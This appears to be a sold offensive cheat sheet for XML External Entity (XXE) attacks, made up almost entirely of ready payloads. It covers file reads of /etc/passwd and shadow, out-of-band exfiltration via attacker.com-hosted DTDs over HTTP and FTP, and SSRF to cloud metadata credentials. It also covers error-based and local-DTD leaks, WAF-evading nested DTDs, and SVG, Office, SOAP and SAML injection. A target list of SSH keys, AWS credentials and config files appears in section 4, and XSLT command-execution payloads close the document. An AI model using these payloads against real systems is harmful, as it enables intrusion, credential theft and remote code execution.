xxe-xml-external-entity

$27

1. CLASSIC XXE PAYLOAD

<?xml version="1.0" encoding="UTF-8"?>

<!DOCTYPE foo [

  <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<root><data>&#x26;xxe;</data></root>

If /etc/passwd reflects in response → confirmed file read.

2. ATTACK SURFACE DISCOVERY

Direct XML Inputs

• SOAP endpoints (text/xml, application/soap+xml)

• REST APIs accepting application/xml

• File upload: .xlsx, .docx, .pptx (Office Open XML)

• SVG uploads (SVG is XML)

• RSS/Atom feed parsers

• Web services with XML config import

Non-Obvious XML Processing

Change Content-Type header on any JSON POST to:

Content-Type: application/xml

Then rewrite body as XML — many backends use dual-format parsers or auto-detect.

PDF Generators

Some HTML→PDF tools (wkhtmltopdf, PrinceXML) execute SSRF via embedded URLs but also parse external entities in SVG/XML included in the HTML.

3. OOB (OUT-OF-BAND) XXE — CRITICAL

Use when direct entity reflection fails (server parses but doesn't echo entity content):

Step 1: Blind detection

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP_COLLABORATOR/">]>

<root>&#x26;xxe;</root>

DNS/HTTP hit to collaborator → confirms XXE (even if no file content returned).

Step 2: OOB file exfiltration via attacker-hosted DTD

Attacker's server hosts a malicious DTD at http://attacker.com/evil.dtd:

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % exfil "<!ENTITY exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">

%exfil;

Payload sent to target:

<?xml version="1.0"?>

<!DOCTYPE foo [

  <!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd">

  %dtd;

]>

<root>&#x26;exfiltrate;</root>

File contents appear in attacker's HTTP server request log.

Step 3: Error-based OOB (alternative when HTTP blocked)

Use intentional error to leak data in error message:

<!-- attacker.com/error.dtd -->

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % eval "<!ENTITY % error SYSTEM 'file:///NONEXISTENT/%file;'>">

%eval;

%error;

4. XXE FILE READ TARGETS

Linux:

/etc/passwd

/etc/shadow  (requires root)

/etc/hosts

/proc/self/environ      ← environment variables (DB creds, API keys)

/proc/self/cmdline      ← process command line

/var/log/apache2/access.log  ← may contain passwords in URLs

/home/USER/.ssh/id_rsa  ← SSH private key

/home/USER/.aws/credentials ← AWS keys

/home/USER/.bash_history

Windows:

C:\Windows\System32\drivers\etc\hosts

C:\inetpub\wwwroot\web.config    ← ASP.NET connection strings

C:\xampp\htdocs\wp-config.php    ← WordPress DB credentials

C:\Users\Administrator\.ssh\id_rsa

5. SVG XXE (file upload context)

When SVG uploads are accepted and served/processed:

<?xml version="1.0" standalone="yes"?>

<!DOCTYPE svg [

  <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<svg xmlns="http://www.w3.org/2000/svg" width="500" height="100">

  <text font-size="16">&#x26;xxe;</text>

</svg>

Upload as .svg → GET /uploads/file.svg → file contents in response.

6. OFFICE FILE XXE (docx/xlsx/pptx)

Office files are ZIP archives containing XML. Inject into [Content_Types].xml or word/document.xml:

# Step 1: extract

unzip original.docx -d extracted/

# Step 2: edit word/document.xml — add malicious DTD

# Add after <?xml version="1.0" encoding="UTF-8" standalone="yes"?>:

# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

# Then use &#x26;xxe; inside document text

# Step 3: repackage

cd extracted &#x26;&#x26; zip -r ../malicious.docx .

7. SOAP ENDPOINT XXE

SOAP requests parse XML by definition. Inject external entity into SOAP envelope:

<?xml version="1.0"?>

<!DOCTYPE foo [

  <!ENTITY xxe SYSTEM "file:///etc/passwd">

]>

<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">

  <soap:Body>

    <getUser>

      <id>&#x26;xxe;</id>

    </getUser>

  </soap:Body>

</soap:Envelope>

8. XXE → SSRF CHAIN

XXE external entity can point to internal HTTP endpoints (identical to SSRF):

<!DOCTYPE foo [

  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">

]>

<root>&#x26;xxe;</root>

This combines XXE file read + SSRF into a single payload.

9. XInclude ATTACK

When server-side processes XInclude (import XML from another source), but you can't control the DOCTYPE:

<foo xmlns:xi="http://www.w3.org/2001/XInclude">

  <xi:include href="file:///etc/passwd" parse="text"/>

</foo>

Works in: Apache Cocoon, Xerces-J, libxml2 with XInclude support enabled.

10. PROTOCOL HANDLERS IN XXE

<!-- HTTP (SSRF) -->

<!ENTITY xxe SYSTEM "http://internal.company.com/admin/">

<!-- File read -->

<!ENTITY xxe SYSTEM "file:///etc/passwd">

<!-- PHP wrapper (if PHP with libxml2) -->

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

<!-- Decode base64 in response to get file contents -->

<!-- FTP (exfil / port scan) -->

<!ENTITY xxe SYSTEM "ftp://attacker.com:21/x">

<!-- Gopher (Redis, SMTP) -->

<!ENTITY xxe SYSTEM "gopher://127.0.0.1:6379/info%0d%0a">

11. BYPASSING DEFENSES

Parser blocks DOCTYPE

Try XInclude (no DOCTYPE needed, see §9).

Only allows specific XML schemas

If schema validation occurs: inject comments or CDATA after schema validation but before entity processing.

Response encoding issues (binary in response)

Use PHP filter for base64:

<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

Network restrictions on OOB

Use DNS-only OOB via SYSTEM "file://HASH.attacker.com" — no HTTP required, DNS lookup leaks data.

12. QUICK DETECTION CHECKLIST

□ Find XML input point (or JSON→XML transformation)

□ Send basic entity: <!ENTITY xxe "test"> → &#x26;xxe; in body → does "test" reflect?

□ If yes → file read: SYSTEM "file:///etc/passwd"

□ If no reflection → OOB test via Collaborator URL

□ If OOB hit → set up attacker DTD for file exfiltration

□ Try SVG upload with XXE

□ Try Content-Type: application/xml on JSON endpoints

□ Try XInclude if DOCTYPE-based fails

13. LOCAL DTD INJECTION (BLIND XXE AMPLIFICATION)

When external entities are blocked but local DTD files exist on the server:

Technique

<!-- Override an entity defined in a LOCAL DTD file -->

<!DOCTYPE foo [

  <!ENTITY % local_dtd SYSTEM "file:///usr/share/yelp/dtd/docbookx.dtd">

  <!ENTITY % ISOamso '

    <!ENTITY &#x26;#x25; file SYSTEM "file:///etc/passwd">

    <!ENTITY &#x26;#x25; eval "<!ENTITY &#x26;#x26;#x25; error SYSTEM &#x26;#x27;file:///nonexistent/&#x26;#x25;file;&#x26;#x27;>">

    &#x26;#x25;eval;

    &#x26;#x25;error;

  '>

  %local_dtd;

]>

Common Local DTD Paths

#### Linux

/usr/share/yelp/dtd/docbookx.dtd           # GNOME Help

/usr/share/xml/fontconfig/fonts.dtd         # Fontconfig

/usr/share/sgml/docbook/xml-dtd-*/docbookx.dtd

/usr/share/xml/scrollkeeper/dtds/scrollkeeper-omf.dtd

/opt/IBM/WebSphere/AppServer/properties/sip-app_1_0.dtd

/usr/share/struts/struts-config_1_0.dtd     # Apache Struts

/usr/share/nmap/nmap.dtd                    # Nmap

/opt/zaproxy/xml/alert.dtd                  # OWASP ZAP

#### Windows

C:\Windows\System32\wbem\xml\cim20.dtd            # WMI

C:\Windows\System32\wbem\xml\wmi20.dtd             # WMI

C:\Program Files\IBM\WebSphere\*.dtd               # WebSphere

C:\Program Files (x86)\Lotus\*.dtd                 # Lotus Notes

#### Inside JAR Files (Java Applications)

jar:file:///usr/share/java/tomcat-*.jar!/javax/servlet/resources/web-app_2_3.dtd

jar:file:///opt/wildfly/modules/*.jar!/org/jboss/as/*.dtd

file:///usr/share/java/struts2-core-*.jar!/struts-2.5.dtd

Why This Works

• External connections blocked (firewall/WAF/egress filter)

• But file:// to LOCAL files is usually allowed

• Local DTD is trusted → entity overrides inject attacker-controlled definitions

• Error messages or blind extraction via file:// still works

14. ADDITIONAL OOB EXFILTRATION CHANNELS

FTP-based exfiltration (line-by-line)

FTP protocol sends data line-by-line, making it useful for multi-line file exfiltration when HTTP-based OOB truncates at newlines:

<!-- attacker.com/ftp-exfil.dtd -->

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % exfil "<!ENTITY &#x26;#x25; send SYSTEM 'ftp://attacker.com:2121/%file;'>">

%exfil;

%send;

Run a rogue FTP server (e.g., xxeserv or custom Python) on port 2121 — each line of the file arrives as a separate RETR or CWD command.

HTTP parameter exfiltration

<!ENTITY % file SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

<!ENTITY % exfil "<!ENTITY &#x26;#x25; send SYSTEM 'http://attacker.com/?d=%file;'>">

%exfil;

%send;

Base64 encoding avoids newline/special-character issues in HTTP URL. Decode the d= parameter on attacker server.

15. DTD NESTING TRICKS — PARAMETER ENTITY CHAINING

Parameter entity within parameter entity

Used to bypass parsers that block direct entity references in entity values:

<!DOCTYPE foo [

  <!ENTITY % a "&#x26;#x25; b;">

  <!ENTITY % b SYSTEM "http://attacker.com/chain.dtd">

  %a;

]>

The parser expands %a; → %b; → fetches external DTD. Some WAFs only inspect the first level of entity definitions.

Triple-nested for filter evasion

<!-- attacker.com/stage1.dtd -->

<!ENTITY % s2 SYSTEM "http://attacker.com/stage2.dtd">

%s2;

<!-- attacker.com/stage2.dtd -->

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % s3 "<!ENTITY &#x26;#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>">

%s3;

%exfil;

Payload sent to target only references stage1.dtd — the actual file read happens two DTD fetches deep, evading shallow WAF inspection.

16. XXE IN NON-OBVIOUS FORMATS

Format

XML Location

Injection Point

SOAP Envelope

Entire body is XML

Add DOCTYPE before <soap:Envelope>

SVG Image

SVG is XML

<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]> in SVG header

OOXML (.docx)

word/document.xml, [Content_Types].xml

Inject DOCTYPE + entity into any XML member

OOXML (.xlsx)

xl/sharedStrings.xml, xl/worksheets/sheet1.xml

Entity reference in cell values

RSS/Atom feeds

Feed body is XML

Inject into feed items if user content is included

SAML assertions

SAML XML tokens

DOCTYPE injection in SAMLResponse parameter (base64-decoded XML)

XMPP

Protocol messages are XML stanzas

Entity in message body or JID fields

GPX files

GPS track data in XML

Via file upload endpoints accepting GPX

XHTML

Strict XHTML is valid XML

DOCTYPE injection in XHTML documents

SAML XXE

<!-- Base64-decode the SAMLResponse, inject DOCTYPE -->

<?xml version="1.0"?>

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol">

  <saml:Assertion>

    <saml:Subject>

      <saml:NameID>&#x26;xxe;</saml:NameID>

    </saml:Subject>

  </saml:Assertion>

</samlp:Response>

Re-encode to base64, submit as SAMLResponse parameter.

17. XXE VIA FILE UPLOAD

SVG upload

<?xml version="1.0"?>

<!DOCTYPE svg [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

<svg xmlns="http://www.w3.org/2000/svg" width="500" height="500">

  <text x="10" y="50" font-size="14">&#x26;xxe;</text>

</svg>

Upload as avatar/image → view uploaded SVG → file content rendered as text.

XLSX (Excel) upload

# 1. Create minimal .xlsx, unzip it

unzip report.xlsx -d xlsx_tmp/

# 2. Inject into xl/sharedStrings.xml

# Add after XML declaration:

# <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>

# Replace a <t> element content with &#x26;xxe;

# 3. Repackage

cd xlsx_tmp &#x26;&#x26; zip -r ../malicious.xlsx .

Alternatively inject into [Content_Types].xml (parsed first by most OOXML processors).

DOCX upload

# Target: word/document.xml

# Same approach: unzip → inject DOCTYPE + entity → repackage

# Alternative: inject into customXml/item1.xml if custom XML parts exist

Processing pipeline attack

Even if the uploaded file is not directly rendered, the server-side parser (Apache POI, python-docx, OpenXML SDK) may process entities during import, triggering OOB exfiltration.

18. ERROR-BASED XXE

Force the XML parser to generate an error message containing file content:

Method 1: Non-existent file reference

<!-- attacker.com/error.dtd -->

<!ENTITY % file SYSTEM "file:///etc/hostname">

<!ENTITY % eval "<!ENTITY &#x26;#x25; error SYSTEM 'file:///nonexistent/%file;'>">

%eval;

%error;

The parser attempts to open file:///nonexistent/<hostname_content> → error message includes the hostname value.

Method 2: XML schema validation error

<!DOCTYPE foo [

  <!ENTITY % file SYSTEM "file:///etc/passwd">

  <!ENTITY % eval "<!ENTITY &#x26;#x25; err SYSTEM 'jar:file:///nonexistent!/%file;'>">

  %eval;

  %err;

]>

The jar: protocol handler generates verbose error messages that include the expanded entity value.

Method 3: Integer overflow / type error

<!ENTITY % file SYSTEM "file:///etc/passwd">

<!ENTITY % int "<!ENTITY &#x26;#x25; trick SYSTEM 'file:///%file;'>">

%int;

%trick;

Parser tries to open a file path containing the target file content → error message reveals content.

19. XSLT INJECTION CONNECTION TO XXE

XSLT processors parse XML and can be chained with XXE:

XSLT file read

<?xml version="1.0"?>

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform">

  <xsl:template match="/">

    <xsl:value-of select="document('file:///etc/passwd')"/>

  </xsl:template>

</xsl:stylesheet>

XSLT RCE (processor-dependent)

<!-- Xalan-J (Java) -->

<xsl:stylesheet version="1.0"

  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

  xmlns:rt="http://xml.apache.org/xalan/java/java.lang.Runtime">

  <xsl:template match="/">

    <xsl:variable name="rtObj" select="rt:getRuntime()"/>

    <xsl:variable name="process" select="rt:exec($rtObj,'id')"/>

  </xsl:template>

</xsl:stylesheet>

<!-- PHP (libxslt with registerPHPFunctions) -->

<xsl:stylesheet version="1.0"

  xmlns:xsl="http://www.w3.org/1999/XSL/Transform"

  xmlns:php="http://php.net/xsl">

  <xsl:template match="/">

    <xsl:value-of select="php:function('system','id')"/>

  </xsl:template>

</xsl:stylesheet>

XXE → XSLT chain

If the target accepts XML input with a stylesheet reference (<?xml-stylesheet?>), inject both an external entity and a malicious XSLT to escalate from file read to RCE.